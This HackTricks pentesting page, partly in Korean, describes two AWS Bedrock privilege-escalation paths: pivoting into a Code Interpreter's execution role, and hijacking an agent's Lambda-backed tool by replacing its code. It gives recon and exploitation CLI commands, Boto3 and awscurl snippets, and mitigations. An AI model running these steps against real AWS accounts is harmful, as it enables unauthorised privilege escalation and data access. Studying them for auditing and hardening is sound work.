AWS - Bedrock PrivEsc

Tip

AWS 해킹 학습 및 실습:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 학습 및 실습: HackTricks Training GCP Red Team Expert (GRTE)
Az 해킹 학습 및 실습: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 플랜을 확인하세요!
• 참여하세요 💬 Discord group 또는 telegram group에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
• PR을 제출하여 해킹 트릭을 공유하세요: HackTricks 및 HackTricks Cloud github repos.

Amazon Bedrock AgentCore

bedrock-agentcore:StartCodeInterpreterSession + bedrock-agentcore:InvokeCodeInterpreter - Code Interpreter Execution-Role Pivot

AgentCore Code Interpreter는 managed execution environment이다. Custom Code Interpreters는 **executionRoleArn**으로 설정할 수 있으며, 이는 “code interpreter가 AWS services에 access할 수 있도록 permissions를 제공”한다.

만약 lower-privileged IAM principal이 더 privileged execution role로 configured된 Code Interpreter session을 start + invoke할 수 있다면, 호출자는 사실상 execution role의 permissions로 pivot할 수 있다 (role scope에 따라 lateral movement / privilege escalation).

Note

이는 일반적으로 misconfiguration / excessive permissions 문제이다 (interpreter execution role에 너무 넓은 permissions를 부여하고/or broad invoke access를 부여하는 것). AWS는 execution roles가 invoke 권한이 있는 identities보다 같거나 더 적은 privileges를 갖도록 하여 privilege escalation을 피하라고 명시적으로 경고한다.

Preconditions (common misconfiguration)

• custom code interpreter가 존재하며, 지나치게 privileged한 execution role을 가진다 (예: sensitive S3/Secrets/SSM 또는 IAM-admin-like capabilities access).
• 사용자(developer/auditor/CI identity)가 다음 permissions를 가진다:
• sessions 시작: bedrock-agentcore:StartCodeInterpreterSession
• tools invoke: bedrock-agentcore:InvokeCodeInterpreter
• (Optional) 사용자가 interpreter를 생성할 수도 있다: bedrock-agentcore:CreateCodeInterpreter (org guardrails에 따라 execution role이 설정된 새 interpreter를 만들 수 있게 한다).

Recon (custom interpreters and execution role usage 식별)

List interpreters (control-plane) and inspect their configuration:

aws bedrock-agentcore-control list-code-interpreters
aws bedrock-agentcore-control get-code-interpreter --code-interpreter-id <CODE_INTERPRETER_ID>

create-code-interpreter 명령은 interpreter가 가질 AWS permissions를 정의하는 --execution-role-arn을 지원합니다.

Step 1 - 세션 시작하기 (이것은 interactive shell이 아니라 sessionId를 반환합니다)

SESSION_ID=$(
aws bedrock-agentcore start-code-interpreter-session \
--code-interpreter-identifier <CODE_INTERPRETER_IDENTIFIER> \
--name "arte-oussama" \
--query sessionId \
--output text
)

echo "SessionId: $SESSION_ID"

Step 2 - Invoke code execution (Boto3 or signed HTTPS)

There is no interactive python shell from start-code-interpreter-session. Execution happens via InvokeCodeInterpreter.

Option A - Boto3 example (execute Python + verify identity):

import boto3

client = boto3.client("bedrock-agentcore", region_name="<REGION>")

# Execute python inside the Code Interpreter session
resp = client.invoke_code_interpreter(
codeInterpreterIdentifier="<CODE_INTERPRETER_IDENTIFIER>",
sessionId="<SESSION_ID>",
name="executeCode",
arguments={
"language": "python",
"code": "import boto3; print(boto3.client('sts').get_caller_identity())"
}
)

# Response is streamed; print events for visibility
for event in resp.get("stream", []):
print(event)

인터프리터가 execution role로 구성되어 있으면, sts:GetCallerIdentity() 출력은 그 role의 identity(낮은 권한의 caller가 아님)를 반영해야 하며, 이를 통해 pivot이 입증됩니다.

옵션 B - Signed HTTPS call (awscurl):

awscurl -X POST \
"https://bedrock-agentcore.<Region>.amazonaws.com/code-interpreters/<CODE_INTERPRETER_IDENTIFIER>/tools/invoke" \
-H "Content-Type: application/json" \
-H "Accept: application/json" \
-H "x-amzn-code-interpreter-session-id: <SESSION_ID>" \
--service bedrock-agentcore \
--region <Region> \
-d '{
"name": "executeCode",
"arguments": {
"language": "python",
"code": "print(\"Hello from AgentCore\")"
}
}'

영향

• Lateral movement into whatever AWS access the interpreter execution role has.
• Privilege escalation if the interpreter execution role is more privileged than the caller.
• Harder detection if CloudTrail data events for interpreter invocations are not enabled (invocations may not be logged by default, depending on configuration).

Mitigations / Hardening

• Least privilege on the interpreter executionRoleArn (treat it like Lambda execution roles / CI roles).
• Restrict who can invoke (bedrock-agentcore:InvokeCodeInterpreter) and who can start sessions.
• Use SCPs to deny InvokeCodeInterpreter except for approved agent runtime roles (org-level enforcement can be necessary).
• Enable appropriate CloudTrail data events for AgentCore where applicable; alert on unexpected invocations and session creation.

Amazon Bedrock Agents

lambda:UpdateFunctionCode, bedrock:InvokeAgent - Agent Tool Hijacking via Lambda

Bedrock Agents can use Lambda-backed action groups as tools (external execution). If a principal can modify the code of a Lambda function used by an agent, and can then invoke the agent, they can execute attacker-controlled code under the Lambda execution role.

Note

This is a cross-service trust abuse (Bedrock → Lambda), not a vulnerability. The attacker may not be able to invoke the Lambda directly, but can still trigger it via the agent.

Preconditions (common misconfiguration)

• A Bedrock Agent exists with an action group backed by a Lambda function
• The attacker has:
• lambda:UpdateFunctionCode
• bedrock:InvokeAgent
• The Lambda execution role has broader permissions than the attacker
• The attacker can identify the Lambda used by the agent

Recon

Enumerate agent action groups:

aws bedrock-agent list-agents
aws bedrock-agent get-agent --agent-id <AGENT_ID>
aws bedrock-agent list-agent-action-groups --agent-id <AGENT_ID> --agent-version DRAFT

Lambda 검사:

aws lambda get-function --function-name <FUNCTION_NAME>

Exploitation

Lambda code 교체:

zip payload.zip lambda_function.py

aws lambda update-function-code \
--function-name <FUNCTION_NAME> \
--zip-file fileb://payload.zip

Example payload:

import boto3

def lambda_handler(event, context):
return boto3.client("sts").get_caller_identity()

Trigger via agent:

aws bedrock-agent-runtime invoke-agent \
--agent-id <AGENT_ID> \
--agent-alias-id <ALIAS_ID> \
--session-id test \
--input-text "trigger tool"

Impact

• Privilege escalation into Lambda execution role
• Data exfiltration from AWS services
• Cross-service abuse via trusted agent execution

Mitigations

• Restrict lambda:UpdateFunctionCode
• Use least-privilege Lambda roles
• Monitor Lambda code changes
• Audit Bedrock agent tool usage

References

• Sonrai: AWS AgentCore privilege escalation path (SCP mitigation)
• Sonrai: Credential exfiltration paths in AWS code interpreters (MMDS)
• AWS CLI: create-code-interpreter (--execution-role-arn)
• AWS CLI: start-code-interpreter-session (returns sessionId)
• AWS Dev Guide: Code Interpreter API reference examples (Boto3 + awscurl invoke)
• AWS Dev Guide: Security credentials management (MMDS + privilege escalation warning)
• SoftwareSecured: AWS Privilege Escalation Techniques (Bedrock agent tool hijacking)

Tip

AWS 해킹 학습 및 실습:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 학습 및 실습: HackTricks Training GCP Red Team Expert (GRTE)
Az 해킹 학습 및 실습: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

• 구독 플랜을 확인하세요!
• 참여하세요 💬 Discord group 또는 telegram group에 참여하거나 Twitter 🐦 @hacktricks_live를 팔로우하세요.
• PR을 제출하여 해킹 트릭을 공유하세요: HackTricks 및 HackTricks Cloud github repos.